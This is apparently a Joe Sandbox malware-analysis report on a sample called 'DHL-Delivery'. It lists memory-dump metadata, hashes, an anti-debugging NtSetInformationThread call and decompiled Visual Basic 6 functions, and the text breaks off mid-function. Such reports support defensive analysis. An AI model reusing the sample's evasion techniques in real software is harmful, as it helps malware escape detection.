                        • String ID: "Bp0$"Bp0$nTAz
                        • API String ID: 449006233-2565102045
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        Uniqueness

                        Uniqueness Score: 0.04%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        • Opcode ID: d683e7ef5c067e016e70c30a197af550101ddec92dd5bc20bc1489618b76122d
                        • Instruction ID: 3eba5f871e3e4942b86691cd2758fa5ecfb1a019986bd258e03520d09fd5da60
                        • Opcode Fuzzy Hash: d683e7ef5c067e016e70c30a197af550101ddec92dd5bc20bc1489618b76122d
                        • Instruction Fuzzy Hash: 94B15A75B80707EFE7188E24CDB07D6B3A2BF16350F954229DC6683280D7359889CB91
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c141efd4540883c98e83e0ee5d0ea7a42b6a0a767c6e13b2885d9b858444a2ae
                        • Instruction ID: d659189db78e2a8b55e9b7bc3bab0924b4fd6aad92b0bd41114fda446e6a4eb0
                        • Opcode Fuzzy Hash: c141efd4540883c98e83e0ee5d0ea7a42b6a0a767c6e13b2885d9b858444a2ae
                        • Instruction Fuzzy Hash: 99519868BC4313DED71899288CB17E623E67F423A0F964269ECB6C7181DB16C886C740
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1bcfc0c6c5084ae65cf4c5c102511a94e845dc48fad67d5462fb12658d51b330
                        • Instruction ID: 389f8c77b7dc419d6c657e9ddb1043fa90a2cad31641c1c5cd616147300c4df6
                        • Opcode Fuzzy Hash: 1bcfc0c6c5084ae65cf4c5c102511a94e845dc48fad67d5462fb12658d51b330
                        • Instruction Fuzzy Hash: 5A519928BC4313EED71859288DB17E623E67F423E0F964269DCB7C3181DB16C885C740
                        Uniqueness

                        Uniqueness Score: 0.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: ffdd864c4e570aa923b789da7514dbc724f3eb4efa281b2e43233ff05cb67030
                        • Instruction ID: a4bb26065a6aa8e708cf22d8854606b87591f5b48c09f1bb3333c192e98846d8
                        • Opcode Fuzzy Hash: ffdd864c4e570aa923b789da7514dbc724f3eb4efa281b2e43233ff05cb67030
                        • Instruction Fuzzy Hash: 1A41917C6C43029DEF225D588E797E273536F02760F928169DD926B1C2D3A5C083C916
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7227a97935511e9b4fc34c18d58f8c96d51b188e1a56e243f8f0649843e4a7f3
                        • Instruction ID: 2b07cd40fb699a8461e1ffbe86dd0dcb8e496d0b6824009e4bc02377ca4d471f
                        • Opcode Fuzzy Hash: 7227a97935511e9b4fc34c18d58f8c96d51b188e1a56e243f8f0649843e4a7f3
                        • Instruction Fuzzy Hash: E741707C6C43029DFB226DA84E7E7E272935F02760FD181A5ED515B1D2D3A5C083C557
                        Uniqueness

                        Uniqueness Score: 0.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 76ba4239b3ce0eab1ca11f70f47778453babada29bc4079e0318fb158de2b8a2
                        • Instruction ID: f6bb2fd751b9cdf02567ad191387b145a5f92c5285ead0c13dd7f193ff84d66b
                        • Opcode Fuzzy Hash: 76ba4239b3ce0eab1ca11f70f47778453babada29bc4079e0318fb158de2b8a2
                        • Instruction Fuzzy Hash: 3241717C7C4302ADEB226DA88E7E7E272536F02B60FE181A5ED515B1D2D3A5C083C516
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 2813fcff062c92f92dbde326759cc2fcea1b2b3080b83ff7081024757077e5ea
                        • Instruction ID: e900088d5f30725fa9b916258e6f2e4fc1fccec22e79fa87b52fd3073d5305b2
                        • Opcode Fuzzy Hash: 2813fcff062c92f92dbde326759cc2fcea1b2b3080b83ff7081024757077e5ea
                        • Instruction Fuzzy Hash: 89313C7C6C4302ADFB326E548E7EBE672526F42760FE28165DE951B0D2D3A5C083C916
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e4be4a32e70ed644ed7332f67df69c2460fd782c2721bdde1d476fd66cbcdc6c
                        • Instruction ID: a8f8c482680207a195301ddd1441134b0e877a4fa13152296eeb36ec4ab37126
                        • Opcode Fuzzy Hash: e4be4a32e70ed644ed7332f67df69c2460fd782c2721bdde1d476fd66cbcdc6c
                        • Instruction Fuzzy Hash: B91126BC6D7145CFD722AA28C4F07E477E3AF56A24BCA41C1D0A28B1C6C321D843CB1A
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b7cdd37873ba9ee841654355f0eff25066b1a47703dbbb0feea6422e0297539a
                        • Instruction ID: 839be16d7486482e79e3aecbd2416f08f04d99562d74ea25ae7c941aa9a615c5
                        • Opcode Fuzzy Hash: b7cdd37873ba9ee841654355f0eff25066b1a47703dbbb0feea6422e0297539a
                        • Instruction Fuzzy Hash: 21C012B6B802848FF300CA14DAA1B8033B0AB22AC0B094080D8128B204E318E802CA00
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5c278200e36d2f5dda35c5775fe644e8cdb34da82566b82e463f717aebf1badc
                        • Instruction ID: 6592a951d5bef39af41ba2a27329262d4f09fa220cc0a3ba63261dbab976564d
                        • Opcode Fuzzy Hash: 5c278200e36d2f5dda35c5775fe644e8cdb34da82566b82e463f717aebf1badc
                        • Instruction Fuzzy Hash: 44C04830290584CFC289CE48C2B8B9673AABF29A80FC204D0E8928FA51D324EC918B00
                        Uniqueness

                        Uniqueness Score: 0.00%

                        C-Code - Quality: 49%
                        			E0041078E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a16) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				void* _v36;
                        				char _v48;
                        				char _v52;
                        				char _v56;
                        				intOrPtr _v64;
                        				char _v72;
                        				intOrPtr _v80;
                        				intOrPtr _v88;
                        				void* _v92;
                        				signed int _v96;
                        				intOrPtr* _v104;
                        				signed int _v108;
                        				signed int _t39;
                        				signed int _t45;
                        				char* _t49;
                        				intOrPtr _t73;
                        
                        				_push(0x4011d6);
                        				_push( *[fs:0x0]);
                        				 *[fs:0x0] = _t73;
                        				_push(0x58);
                        				L004011D0();
                        				_v12 = _t73;
                        				_v8 = 0x401160;
                        				L004012DE();
                        				_v64 = 0x4b;
                        				_v72 = 2;
                        				_t39 =  &_v72;
                        				_push(_t39);
                        				L00401278();
                        				L00401320();
                        				_push(_t39);
                        				_push(0x40e784);
                        				_push(0x40e78c);
                        				L0040131A();
                        				L00401320();
                        				_push(_t39);
                        				L00401308();
                        				asm("sbb eax, eax");
                        				_v92 =  ~( ~_t39 + 1);
                        				_push( &_v52);
                        				_push( &_v48);
                        				_push(2);
                        				L0040129C();
                        				L004012D8();
                        				_t45 = _v92;
                        				if(_t45 != 0) {
                        					if( *0x412010 != 0) {
                        						_v104 = 0x412010;
                        					} else {
                        						_push(0x412010);
                        						_push(0x40e9a0);
                        						L004012C6();
                        						_v104 = 0x412010;
                        					}
                        					_t49 =  &_v56;
                        					L004012CC();
                        					_v92 = _t49;
                        					_v80 = 0x80020004;
                        					_v88 = 0xa;
                        					L004011D0();
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					_t45 =  *((intOrPtr*)( *_v92 + 0x1b0))(_v92, 0x10, _t49,  *((intOrPtr*)( *((intOrPtr*)( *_v104)) + 0x300))( *_v104));
                        					asm("fclex");
                        					_v96 = _t45;
                        					if(_v96 >= 0) {
                        						_v108 = _v108 & 0x00000000;
                        					} else {
                        						_push(0x1b0);
                        						_push(0x40e6c4);
                        						_push(_v92);
                        						_push(_v96);
                        						L004012C0();
                        						_v108 = _t45;
                        					}
                        					L004012A8();
                        				}
                        				asm("wait");
                        				_push(0x410912);
                        				L004012D8();
                        				return _t45;
                        			}

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 004107A9
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 004107C1
                        • #572.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011D6), ref: 004107D8
                        • __vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011D6), ref: 004107E2
                        • __vbaStrCat.MSVBVM60(0040E78C,0040E784,00000000,00000002), ref: 004107F2
                        • __vbaStrMove.MSVBVM60(0040E78C,0040E784,00000000,00000002), ref: 004107FC
                        • __vbaStrCmp.MSVBVM60(00000000,0040E78C,0040E784,00000000,00000002), ref: 00410802
                        • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,0040E78C,0040E784,00000000,00000002), ref: 0041081C
                        • __vbaFreeVar.MSVBVM60 ref: 00410827
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 0041084B
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410878
                        • __vbaChkstk.MSVBVM60(?,00000000), ref: 00410891
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6C4,000001B0), ref: 004108C8
                        • __vbaFreeObj.MSVBVM60(00000000,?,0040E6C4,000001B0), ref: 004108D9
                        • __vbaFreeVar.MSVBVM60(00410912), ref: 0041090C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$Free$ChkstkMove$#572CheckHresultListNew2
                        • String ID: K
                        • API String ID: 72651421-856455061
                        • Opcode ID: b3a86521a1edaa85f39e09b13f6bf3475082cca89d0e913bfb83d62787983aa4
                        • Instruction ID: 7f89cbc46d3b3b53bff1dad259a1557e6c18c1b75b9ba84245b251bf0ed0a8fa
                        • Opcode Fuzzy Hash: b3a86521a1edaa85f39e09b13f6bf3475082cca89d0e913bfb83d62787983aa4
                        • Instruction Fuzzy Hash: 50415B71910248ABDB00EFE2C946BDEB7B8AF08704F20452EF501FB2E1DBB85945CB59
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 53%
                        			E00410F15(void* __ebx, void* __edi, void* __esi, char __fp0, intOrPtr* _a4, void* _a12, void* _a24) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				void* _v40;
                        				void* _v44;
                        				char _v48;
                        				char _v52;
                        				intOrPtr _v60;
                        				intOrPtr _v68;
                        				char _v76;
                        				intOrPtr _v84;
                        				char _v92;
                        				intOrPtr _v100;
                        				short _v104;
                        				intOrPtr* _v108;
                        				signed int _v112;
                        				intOrPtr* _v116;
                        				signed int _v120;
                        				intOrPtr* _v132;
                        				signed int _v136;
                        				intOrPtr* _v140;
                        				short _v144;
                        				char _v148;
                        				signed int _v152;
                        				char* _t71;
                        				signed int _t75;
                        				char* _t79;
                        				signed int _t86;
                        				char* _t88;
                        				intOrPtr _t97;
                        				void* _t110;
                        				void* _t112;
                        				intOrPtr _t113;
                        				char _t119;
                        
                        				_t119 = __fp0;
                        				_t113 = _t112 - 0xc;
                        				 *[fs:0x0] = _t113;
                        				L004011D0();
                        				_v16 = _t113;
                        				_v12 = 0x4011b0;
                        				_v8 = 0;
                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011d6, _t110);
                        				L004012A2();
                        				L004012DE();
                        				if( *0x412010 != 0) {
                        					_v132 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v132 = 0x412010;
                        				}
                        				_t71 =  &_v48;
                        				L004012CC();
                        				_v108 = _t71;
                        				_t75 =  *((intOrPtr*)( *_v108 + 0xd8))(_v108,  &_v104, _t71,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x310))( *_v132));
                        				asm("fclex");
                        				_v112 = _t75;
                        				if(_v112 >= 0) {
                        					_v136 = _v136 & 0x00000000;
                        				} else {
                        					_push(0xd8);
                        					_push(0x40e6f8);
                        					_push(_v108);
                        					_push(_v112);
                        					L004012C0();
                        					_v136 = _t75;
                        				}
                        				if( *0x412010 != 0) {
                        					_v140 = 0x412010;
                        				} else {
                        					_push(0x412010);
                        					_push(0x40e9a0);
                        					L004012C6();
                        					_v140 = 0x412010;
                        				}
                        				_t97 =  *((intOrPtr*)( *_v140));
                        				_t79 =  &_v52;
                        				L004012CC();
                        				_v116 = _t79;
                        				_v92 = 0x80020004;
                        				_v100 = 0xa;
                        				_v76 = 0x80020004;
                        				_v84 = 0xa;
                        				_v60 = 0x80020004;
                        				_v68 = 0xa;
                        				L004011D0();
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				L004011D0();
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				L004011D0();
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				asm("movsd");
                        				_v144 = _v104;
                        				asm("fild dword [ebp-0x8c]");
                        				_v148 = _t119;
                        				_v76 = _v148;
                        				_t86 =  *((intOrPtr*)( *_v116 + 0x224))(_v116, _t97, 0x10, 0x10, 0x10, _t79,  *((intOrPtr*)(_t97 + 0x304))( *_v140));
                        				asm("fclex");
                        				_v120 = _t86;
                        				if(_v120 >= 0) {
                        					_v152 = _v152 & 0x00000000;
                        				} else {
                        					_push(0x224);
                        					_push(0x40e6b4);
                        					_push(_v116);
                        					_push(_v120);
                        					L004012C0();
                        					_v152 = _t86;
                        				}
                        				_push( &_v52);
                        				_t88 =  &_v48;
                        				_push(_t88);
                        				_push(2);
                        				L004012BA();
                        				asm("wait");
                        				_push(0x411142);
                        				L004012D8();
                        				L00401314();
                        				return _t88;
                        			}


                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 00410F33
                        • __vbaStrCopy.MSVBVM60(?,?,?,?,004011D6), ref: 00410F5D
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 00410F68
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,?,?,?,?,004011D6), ref: 00410F80
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410FAD
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6F8,000000D8), ref: 00410FE2
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010), ref: 00411009
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411042
                        • __vbaChkstk.MSVBVM60(?,00000000), ref: 00411077
                        • __vbaChkstk.MSVBVM60(?,00000000), ref: 00411088
                        • __vbaChkstk.MSVBVM60(?,00000000), ref: 00411099
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6B4,00000224,?,?,00000000), ref: 004110F0
                        • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0041110E
                        • __vbaFreeVar.MSVBVM60(00411142,?,?,004011D6), ref: 00411134
                        • __vbaFreeStr.MSVBVM60(00411142,?,?,004011D6), ref: 0041113C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$Chkstk$Free$CheckHresultNew2$CopyList
                        • String ID:
                        • API String ID: 3169856408-0
                        • Opcode ID: 027f098705b9b880d8ec3fa40b53142c158e182d209b448ff24dbf66faa871b5
                        • Instruction ID: 318ca39a6a55ff594d7475d310148ad5199da1e9b753c8aa78ed879678017c84
                        • Opcode Fuzzy Hash: 027f098705b9b880d8ec3fa40b53142c158e182d209b448ff24dbf66faa871b5
                        • Instruction Fuzzy Hash: 86514670900218EFCB10DFA1C885BDDBBB5BF08304F2044AAF605BB2A1CBB95995DF59
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 56%
                        			E0041092D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				void* _v48;
                        				void* _v52;
                        				char _v56;
                        				intOrPtr _v64;
                        				char _v72;
                        				char _v88;
                        				intOrPtr _v96;
                        				char _v104;
                        				void* _v124;
                        				signed int _v128;
                        				intOrPtr* _v140;
                        				signed int _v144;
                        				intOrPtr _t47;
                        				char* _t49;
                        				short _t51;
                        				signed int _t55;
                        				char* _t59;
                        				void* _t75;
                        				void* _t77;
                        				intOrPtr _t78;
                        
                        				_t78 = _t77 - 0xc;
                        				 *[fs:0x0] = _t78;
                        				L004011D0();
                        				_v16 = _t78;
                        				_v12 = 0x401170;
                        				_v8 = 0;
                        				_t47 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x4011d6, _t75);
                        				L004012DE();
                        				_push(0x40e6b0);
                        				_push(0x40e794);
                        				L0040131A();
                        				L00401320();
                        				_push(_t47);
                        				_push(0x40e794);
                        				L0040131A();
                        				_v64 = _t47;
                        				_v72 = 8;
                        				_push( &_v72);
                        				_t49 =  &_v88;
                        				_push(_t49);
                        				L00401272();
                        				_push(0x40e794);
                        				_push(0x40e794);
                        				L0040131A();
                        				_v96 = _t49;
                        				_v104 = 0x8008;
                        				_push( &_v88);
                        				_t51 =  &_v104;
                        				_push(_t51);
                        				L004012FC();
                        				_v124 = _t51;
                        				L00401314();
                        				_push( &_v104);
                        				_push( &_v88);
                        				_push( &_v72);
                        				_push(3);
                        				L0040130E();
                        				_t55 = _v124;
                        				if(_t55 != 0) {
                        					if( *0x412010 != 0) {
                        						_v140 = 0x412010;
                        					} else {
                        						_push(0x412010);
                        						_push(0x40e9a0);
                        						L004012C6();
                        						_v140 = 0x412010;
                        					}
                        					_t59 =  &_v56;
                        					L004012CC();
                        					_v124 = _t59;
                        					_t55 =  *((intOrPtr*)( *_v124 + 0x1c4))(_v124, _t59,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x310))( *_v140));
                        					asm("fclex");
                        					_v128 = _t55;
                        					if(_v128 >= 0) {
                        						_v144 = _v144 & 0x00000000;
                        					} else {
                        						_push(0x1c4);
                        						_push(0x40e6f8);
                        						_push(_v124);
                        						_push(_v128);
                        						L004012C0();
                        						_v144 = _t55;
                        					}
                        					L004012A8();
                        				}
                        				_push(0x410adb);
                        				L004012D8();
                        				return _t55;
                        			}

                        APIs
                        • __vbaChkstk.MSVBVM60(?,004011D6), ref: 00410949
                        • __vbaVarDup.MSVBVM60(?,?,?,?,004011D6), ref: 00410973
                        • __vbaStrCat.MSVBVM60(0040E794,0040E6B0,?,?,?,?,004011D6), ref: 00410982
                        • __vbaStrMove.MSVBVM60(0040E794,0040E6B0,?,?,?,?,004011D6), ref: 0041098C
                        • __vbaStrCat.MSVBVM60(0040E794,00000000,0040E794,0040E6B0,?,?,?,?,004011D6), ref: 00410997
                        • #520.MSVBVM60(?,00000008), ref: 004109AE
                        • __vbaStrCat.MSVBVM60(0040E794,0040E794,?,00000008), ref: 004109BD
                        • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,0040E794,0040E794,?,00000008), ref: 004109D4
                        • __vbaFreeStr.MSVBVM60(00008008,?,?,?,?,?,0040E794,0040E794,?,00000008), ref: 004109E0
                        • __vbaFreeVarList.MSVBVM60(00000003,00000008,?,00008008,00008008,?,?,?,?,?,0040E794,0040E794,?,00000008), ref: 004109F3
                        • __vbaNew2.MSVBVM60(0040E9A0,00412010,?,?,?,004011D6), ref: 00410A1A
                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410A53
                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040E6F8,000001C4), ref: 00410A84
                        • __vbaFreeObj.MSVBVM60(00000000,?,0040E6F8,000001C4), ref: 00410A9B
                        • __vbaFreeVar.MSVBVM60(00410ADB,?,?,?,004011D6), ref: 00410AD5
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __vba$Free$#520CheckChkstkHresultListMoveNew2
                        • String ID:
                        • API String ID: 317386380-0
                        • Opcode ID: 424836248bb3552e55d5bbb29d5d4f96e23778803c54b028c73562d047ccf534
                        • Instruction ID: c4b3025b7bd781c1e4f3ff50fc6e1a75ad06e6a32777ad2f26da1def70e87cce
                        • Opcode Fuzzy Hash: 424836248bb3552e55d5bbb29d5d4f96e23778803c54b028c73562d047ccf534
                        • Instruction Fuzzy Hash: F6412A70900208ABDB10EFA1C945FDD7BB8AF08704F20846AF505FB1A1DBB85A89CF59
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 55%
                        			E00410D54(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				signed int _v24;
                        				void* _v40;
                        				void* _v44;
                        				intOrPtr _v52;
                        				char _v60;
                        				char _v76;
                        				intOrPtr _v116;
                        				char _v124;
                        				char _v128;
                        				void* _v132;
                        				signed int _v136;
                        				intOrPtr* _v140;
                        				signed int _v144;
                        				char _v152;
                        				signed int _v156;
                        				signed int _v160;
                        				short _t54;
                        				signed int _t57;
                        				signed int _t63;
                        				intOrPtr _t79;
                        
                        				_push(0x4011d6);
                        				_push( *[fs:0x0]);
                        				 *[fs:0x0] = _t79;
                        				L004011D0();
                        				_v12 = _t79;
                        				_v8 = 0x4011a0;
                        				L004012DE();
                        				_v52 = 9;
                        				_v60 = 2;
                        				_push( &_v60);
                        				_push( &_v76);
                        				L0040126C();
                        				_v116 = 0xb;
